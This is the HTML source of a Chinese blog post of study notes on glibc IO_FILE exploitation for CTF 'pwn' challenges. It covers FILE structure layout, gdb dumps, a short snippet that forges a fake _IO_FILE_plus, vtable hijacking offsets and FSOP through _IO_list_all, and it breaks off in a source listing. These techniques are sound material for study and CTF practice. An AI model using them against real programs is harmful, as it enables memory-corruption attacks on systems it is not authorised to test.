<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="笔记记一下不错的文章：IO FILE 之任意读写 « 平凡路上 (ray-cp.github.io) FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构，称为文件流。 在标准的I&#x2F;O库中，每个进程启动时有三个文件流是自动打开的：stdin、stdout、stderr。因此在初始状态下，程序会产生三个FILE结构，这三个结构对应的符号为：_IO_2_1_stdin_、_IO_2_1">
<meta property="og:type" content="article">
<meta property="og:title" content="IO_FILE">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2022/06/08/IO-FILE/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="笔记记一下不错的文章：IO FILE 之任意读写 « 平凡路上 (ray-cp.github.io) FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构，称为文件流。 在标准的I&#x2F;O库中，每个进程启动时有三个文件流是自动打开的：stdin、stdout、stderr。因此在初始状态下，程序会产生三个FILE结构，这三个结构对应的符号为：_IO_2_1_stdin_、_IO_2_1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2022/06/08/IO-FILE/fsop-1.jpg">
<meta property="og:image" content="https://github.com/2022/06/08/IO-FILE/fsop-2.jpg">
<meta property="article:published_time" content="2022-06-08T05:56:12.000Z">
<meta property="article:modified_time" content="2022-07-29T10:50:39.285Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="IO_FILE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2022/06/08/IO-FILE/fsop-1.jpg">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/06/08/IO-FILE/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>IO_FILE | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/06/08/IO-FILE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          IO_FILE
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-06-08 13:56:12" itemprop="dateCreated datePublished" datetime="2022-06-08T13:56:12+08:00">2022-06-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-07-29 18:50:39" itemprop="dateModified" datetime="2022-07-29T18:50:39+08:00">2022-07-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>笔记</h3><p>记一下不错的文章：<a target="_blank" rel="noopener" href="https://ray-cp.github.io/archivers/IO_FILE_arbitrary_read_write">IO FILE 之任意读写 « 平凡路上 (ray-cp.github.io)</a></p>
<p>FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构，称为文件流。</p>
<p>在标准的I/O库中，每个进程启动时有三个文件流是自动打开的：stdin、stdout、stderr。因此在初始状态下，程序会产生三个FILE结构，这三个结构对应的符号为：<code>_IO_2_1_stdin_</code>、<code>_IO_2_1_stdout_</code>、<code>_IO_2_1_stderr</code>，且这三个FILE结构都位于libc段。</p>
<p>FILE结构如下构成</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> &#123;</span></span><br><span class="line">  <span class="keyword">int</span> _flags;       <span class="comment">/* High-order word is _IO_MAGIC; rest is flags. */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _IO_file_flags _flags</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* The following pointers correspond to the C++ streambuf protocol. */</span></span><br><span class="line">  <span class="comment">/* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_read_ptr;   <span class="comment">/* Current read pointer */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_read_end;   <span class="comment">/* End of get area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_read_base;  <span class="comment">/* Start of putback+get area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_write_base; <span class="comment">/* Start of put area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_write_ptr;  <span class="comment">/* Current put pointer. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_write_end;  <span class="comment">/* End of put area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_buf_base;   <span class="comment">/* Start of reserve area. */</span></span><br><span class="line">  <span class="keyword">char</span>* _IO_buf_end;    <span class="comment">/* End of reserve area. */</span></span><br><span class="line">  <span class="comment">/* The following fields are used to support backing up and undo. */</span></span><br><span class="line">  <span class="keyword">char</span> *_IO_save_base; <span class="comment">/* Pointer to start of non-current get area. */</span></span><br><span class="line">  <span class="keyword">char</span> *_IO_backup_base;  <span class="comment">/* Pointer to first valid character of backup area */</span></span><br><span class="line">  <span class="keyword">char</span> *_IO_save_end; <span class="comment">/* Pointer to end of non-current get area. */</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_marker</span> *_<span class="title">markers</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> *_<span class="title">chain</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">int</span> _fileno;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">if</span> 0</span></span><br><span class="line">  <span class="keyword">int</span> _blksize;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">else</span></span></span><br><span class="line">  <span class="keyword">int</span> _flags2;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">  _IO_off_t _old_offset; <span class="comment">/* This used to be _offset but it&#x27;s too small.  */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> __HAVE_COLUMN <span class="comment">/* temporary */</span></span></span><br><span class="line">  <span class="comment">/* 1+column number of pbase(); 0 is unknown. */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">short</span> _cur_column;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">char</span> _vtable_offset;</span><br><span class="line">  <span class="keyword">char</span> _shortbuf[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">  <span class="comment">/*  char* _save_gptr;  char* _save_egptr; */</span></span><br><span class="line"></span><br><span class="line">  _IO_lock_t *_lock;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> _IO_USE_OLD_IO_FILE</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE_complete</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> _<span class="title">file</span>;</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">if</span> defined _G_IO_IO_FILE_VERSION &amp;&amp; _G_IO_IO_FILE_VERSION == 0x20001</span></span><br><span class="line">  _IO_off64_t _offset;</span><br><span class="line"><span class="meta"># <span class="meta-keyword">if</span> defined _LIBC || defined _GLIBCPP_USE_WCHAR_T</span></span><br><span class="line">  <span class="comment">/* Wide character stream stuff.  */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_codecvt</span> *_<span class="title">codecvt</span>;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_wide_data</span> *_<span class="title">wide_data</span>;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE</span> *_<span class="title">freeres_list</span>;</span></span><br><span class="line">  <span class="keyword">void</span> *_freeres_buf;</span><br><span class="line"><span class="meta"># <span class="meta-keyword">else</span></span></span><br><span class="line">  <span class="keyword">void</span> *__pad1;</span><br><span class="line">  <span class="keyword">void</span> *__pad2;</span><br><span class="line">  <span class="keyword">void</span> *__pad3;</span><br><span class="line">  <span class="keyword">void</span> *__pad4;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">size_t</span> __pad5;</span><br><span class="line">  <span class="keyword">int</span> _mode;</span><br><span class="line">  <span class="comment">/* Make sure we don&#x27;t get into trouble again.  */</span></span><br><span class="line">  <span class="keyword">char</span> _unused2[<span class="number">15</span> * <span class="keyword">sizeof</span> (<span class="keyword">int</span>) - <span class="number">4</span> * <span class="keyword">sizeof</span> (<span class="keyword">void</span> *) - <span class="keyword">sizeof</span> (<span class="keyword">size_t</span>)];</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>举个例子，<code>_IO_2_1_stderr_</code>结构如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ p _IO_2_1_stderr_</span><br><span class="line">$<span class="number">3</span> = &#123;</span><br><span class="line">  file = &#123;</span><br><span class="line">    _flags = <span class="number">0xfbad2087</span>, </span><br><span class="line">    _IO_read_ptr = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_read_end = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_read_base = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_write_base = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_write_ptr = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_write_end = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_buf_base = <span class="number">0x7ffff7fb7663</span> &lt;_IO_2_1_stderr_+<span class="number">131</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_buf_end = <span class="number">0x7ffff7fb7664</span> &lt;_IO_2_1_stderr_+<span class="number">132</span>&gt; <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _IO_save_base = <span class="number">0x0</span>, </span><br><span class="line">    _IO_backup_base = <span class="number">0x0</span>, </span><br><span class="line">    _IO_save_end = <span class="number">0x0</span>, </span><br><span class="line">    _markers = <span class="number">0x0</span>, </span><br><span class="line">    _chain = <span class="number">0x7ffff7fb76c0</span> &lt;_IO_2_1_stdout_&gt;, </span><br><span class="line">    _fileno = <span class="number">0x2</span>, </span><br><span class="line">    _flags2 = <span class="number">0x0</span>, </span><br><span class="line">    _old_offset = <span class="number">0xffffffffffffffff</span>, </span><br><span class="line">    _cur_column = <span class="number">0x0</span>, </span><br><span class="line">    _vtable_offset = <span class="number">0x0</span>, </span><br><span class="line">    _shortbuf = <span class="string">&quot;&quot;</span>, </span><br><span class="line">    _lock = <span class="number">0x7ffff7fb9660</span> &lt;_IO_stdfile_2_lock&gt;, </span><br><span class="line">    _offset = <span class="number">0xffffffffffffffff</span>, </span><br><span class="line">    _codecvt = <span class="number">0x0</span>, </span><br><span class="line">    _wide_data = <span class="number">0x7ffff7fb67a0</span> &lt;_IO_wide_data_2&gt;, </span><br><span class="line">    _freeres_list = <span class="number">0x0</span>, </span><br><span class="line">    _freeres_buf = <span class="number">0x0</span>, </span><br><span class="line">    __pad5 = <span class="number">0x0</span>, </span><br><span class="line">    _mode = <span class="number">0x0</span>, </span><br><span class="line">    _unused2 = <span class="string">&#x27;\000&#x27;</span> &lt;repeats <span class="number">19</span> times&gt;</span><br><span class="line">  &#125;, </span><br><span class="line">  vtable = <span class="number">0x7ffff7fb84a0</span> &lt;_IO_file_jumps&gt;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>注意其中的file才是<code>_IO_FILE</code>结构</p>
<p>同时<code>_IO_FILE</code>结构外包裹着另一种结构<code>_IO_FILE_plus</code>，这个结构就相当于<code>_IO_FILE + vtable</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">IO_FILE_plus</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    _IO_FILE    file;</span><br><span class="line">    IO_jump_t   *vtable;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>每个FILE结构会通过其中的<code>_chain</code>域来串联成一个单向链表，链表的头部记录在<code>_IO_list_all</code>这个全局变量中，程序可以通过其来遍历所有FILE结构。</p>
<p>初始时<code>_IO_list_all -&gt; _IO_2_1_stderr_ -&gt; _IO_2_1_stdout_ -&gt; _IO_2_1_stdin_</code></p>
<p>当程序调用<code>fopen</code>时，意味着一个新的FILE结构会被创建，其步骤如下：</p>
<ul>
<li>使用 malloc 分配 FILE 结构</li>
<li>设置 FILE 结构的 vtable</li>
<li>初始化分配的 FILE 结构</li>
<li>将初始化的 FILE 结构链入 FILE 结构链表中</li>
<li>调用系统调用打开文件</li>
</ul>
<p>但是由<code>fopen</code>创建的文件流是分配在堆内存上的</p>
<h3 id="pwn-debug生成fake-IO-FILE"><a href="#pwn-debug生成fake-IO-FILE" class="headerlink" title="pwn_debug生成fake_IO_FILE"></a>pwn_debug生成fake_IO_FILE</h3><p>用pwn_debug的类来快捷生成伪造的<code>_IO_FLE_plus</code>结构，如下即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn_debug <span class="keyword">import</span> *</span><br><span class="line">fake_FILE = IO_FIEL_plus()</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line">flag&amp;=~<span class="number">8</span></span><br><span class="line">flag|=<span class="number">0x8000</span></span><br><span class="line">fake_FILE._flags = flag</span><br><span class="line">fake_FILE._IO_write_ptr = <span class="number">1</span></span><br><span class="line">fake_FILE._IO_write_base = <span class="number">0</span></span><br><span class="line">fake_FILE.vtable = <span class="number">0x61616161</span></span><br><span class="line">fake_FILE.show()</span><br></pre></td></tr></table></figure>

<h2 id="劫持vtable"><a href="#劫持vtable" class="headerlink" title="劫持vtable"></a>劫持vtable</h2><p>简单点说就是在一些函数的调用链中存在“通过vtable指针到一个结构体中找到对应函数指针来调用函数”的这一过程，同时vtable本身也是个指针，所以这里就有两种思路：①直接修改vtable指向的结构体中的函数指针。②修改vtable指针，使其指向一片我们可控的区域，再在里面布置函数指针。</p>
<p>但是从glibc-2.23开始，位于libc数据段的vtable指向的结构体不可写，所以要用第二种方法</p>
<p>要使用第二种方法的话需要知道函数最后会调用vtable中的哪个函数，这样才能对应地去修改</p>
<p>当然不是所有函数都会用到<code>_IO_FILE</code>结构，所以具体还得自己掌握</p>
<h4 id="例如"><a href="#例如" class="headerlink" title="例如"></a>例如</h4><p>以exit函数为例</p>
<blockquote>
<p>程序调用 <code>exit</code> 后，会遍历 <code>_IO_list_all</code> ，调用 <code>_IO_2_1_stdout_</code> 下的 <code>vtable</code> 中 <code>_setbuf</code> 函数。</p>
</blockquote>
<p>那么我们就知道<code>exit</code>函数会去调用<code>vtable</code>中的<code>_setbuf</code>，然后去查看<code>_setbuf</code>在<code>vtable</code>中的偏移</p>
<p>首先找到对应的流</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ p &amp;_IO_2_1_stdout_</span><br><span class="line">$1 = (struct _IO_FILE_plus *) 0x7fc602899620 &lt;_IO_2_1_stdout_&gt;</span><br></pre></td></tr></table></figure>

<p>在libc-2.23版本下，vtable位于_IO_FILE + 0x94/0xd8（32位/64位），由于版本的不同所以可以选择在IDA中搜索vtable符号来找到对应的偏移</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x/gx 0x7fc602899620+0xd8</span><br><span class="line">0x7fc6028996f8 &lt;_IO_2_1_stdout_+216&gt;:	0x00007fc6028976e0</span><br><span class="line"></span><br><span class="line">gdb-peda$ x/32gx 0x00007fc6028976e0</span><br><span class="line">0x7fc6028976e0 &lt;_IO_file_jumps&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7fc6028976f0 &lt;_IO_file_jumps+16&gt;:	0x00007fc60254d9d0	0x00007fc60254e740</span><br><span class="line">0x7fc602897700 &lt;_IO_file_jumps+32&gt;:	0x00007fc60254e4b0	0x00007fc60254f610</span><br><span class="line">0x7fc602897710 &lt;_IO_file_jumps+48&gt;:	0x00007fc602550990	0x00007fc60254d1f0</span><br><span class="line">0x7fc602897720 &lt;_IO_file_jumps+64&gt;:	0x00007fc60254ced0	0x00007fc60254c4d0</span><br><span class="line">0x7fc602897730 &lt;_IO_file_jumps+80&gt;:	0x00007fc60254fa10	0x00007fc60254c440</span><br><span class="line">0x7fc602897740 &lt;_IO_file_jumps+96&gt;:	0x00007fc60254c380	0x00007fc602541190</span><br><span class="line">0x7fc602897750 &lt;_IO_file_jumps+112&gt;:	0x00007fc60254d1b0	0x00007fc60254cb80</span><br><span class="line">0x7fc602897760 &lt;_IO_file_jumps+128&gt;:	0x00007fc60254c980	0x00007fc60254c350</span><br><span class="line">0x7fc602897770 &lt;_IO_file_jumps+144&gt;:	0x00007fc60254cb70	0x00007fc602550b00</span><br><span class="line">0x7fc602897780 &lt;_IO_file_jumps+160&gt;:	0x00007fc602550b10	0x0000000000000000</span><br><span class="line"></span><br><span class="line">gdb-peda$ p _IO_file_jumps</span><br><span class="line">$2 = &#123;</span><br><span class="line">  __dummy = 0x0, </span><br><span class="line">  __dummy2 = 0x0, </span><br><span class="line">  __finish = 0x7fc60254d9d0 &lt;_IO_new_file_finish&gt;, </span><br><span class="line">  __overflow = 0x7fc60254e740 &lt;_IO_new_file_overflow&gt;, </span><br><span class="line">  __underflow = 0x7fc60254e4b0 &lt;_IO_new_file_underflow&gt;, </span><br><span class="line">  __uflow = 0x7fc60254f610 &lt;__GI__IO_default_uflow&gt;, </span><br><span class="line">  __pbackfail = 0x7fc602550990 &lt;__GI__IO_default_pbackfail&gt;, </span><br><span class="line">  __xsputn = 0x7fc60254d1f0 &lt;_IO_new_file_xsputn&gt;, </span><br><span class="line">  __xsgetn = 0x7fc60254ced0 &lt;__GI__IO_file_xsgetn&gt;, </span><br><span class="line">  __seekoff = 0x7fc60254c4d0 &lt;_IO_new_file_seekoff&gt;, </span><br><span class="line">  __seekpos = 0x7fc60254fa10 &lt;_IO_default_seekpos&gt;, </span><br><span class="line">  __setbuf = 0x7fc60254c440 &lt;_IO_new_file_setbuf&gt;, </span><br><span class="line">  __sync = 0x7fc60254c380 &lt;_IO_new_file_sync&gt;, </span><br><span class="line">  __doallocate = 0x7fc602541190 &lt;__GI__IO_file_doallocate&gt;, </span><br><span class="line">  __read = 0x7fc60254d1b0 &lt;__GI__IO_file_read&gt;, </span><br><span class="line">  __write = 0x7fc60254cb80 &lt;_IO_new_file_write&gt;, </span><br><span class="line">  __seek = 0x7fc60254c980 &lt;__GI__IO_file_seek&gt;, </span><br><span class="line">  __close = 0x7fc60254c350 &lt;__GI__IO_file_close&gt;, </span><br><span class="line">  __stat = 0x7fc60254cb70 &lt;__GI__IO_file_stat&gt;, </span><br><span class="line">  __showmanyc = 0x7fc602550b00 &lt;_IO_default_showmanyc&gt;, </span><br><span class="line">  __imbue = 0x7fc602550b10 &lt;_IO_default_imbue&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到<code>_setbuf</code>对应的偏移是0x58，那么只需要在伪造的vtable+0x58的这个位置布置函数指针即可。</p>
<p>puts函数会调用<code>_IO_2_1_stdout_</code>的<code>vtable</code>中的<code>__xsputn</code>，但由于puts函数在程序中经常被调用，所以如果先改虚表再布置指针的话就会出现错误，这时就可以选择先在一个地址上布置函数指针，然后再改<code>_IO_2_1_stdout_</code>的虚表指针，这样就没有问题。</p>
<h2 id="FSOP"><a href="#FSOP" class="headerlink" title="FSOP"></a>FSOP</h2><p>由前面可知程序会通过<code>_IO_list_all</code>来寻找FILE结构，所以FSOP的核心就在于修改<code>_IO_list_all</code>的值使得我们能够伪造链表以及<code>_IO_FILE</code>，同时其利用<code>_IO_flush_all_lockp</code>来触发攻击，<code>_IO_flush_all_lockp</code>函数会在一些情况下被调用：</p>
<ol>
<li>当libc执行abort流程时（比如破坏堆结构后被check到了等等）</li>
<li>程序显式调用exit时</li>
<li>程序执行流从main函数返回时</li>
</ol>
<p>该函数部分源码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span></span><br><span class="line">_IO_flush_all_lockp (<span class="keyword">int</span> do_lock)</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  fp = (_IO_FILE *) _IO_list_all;</span><br><span class="line">  <span class="keyword">while</span> (fp != <span class="literal">NULL</span>)</span><br><span class="line">  &#123;</span><br><span class="line">       ...</span><br><span class="line">       <span class="keyword">if</span> (((fp-&gt;_mode &lt;= <span class="number">0</span> &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base))</span><br><span class="line">               &amp;&amp; _IO_OVERFLOW (fp, EOF) == EOF)</span><br><span class="line">           &#123;</span><br><span class="line">               result = EOF;</span><br><span 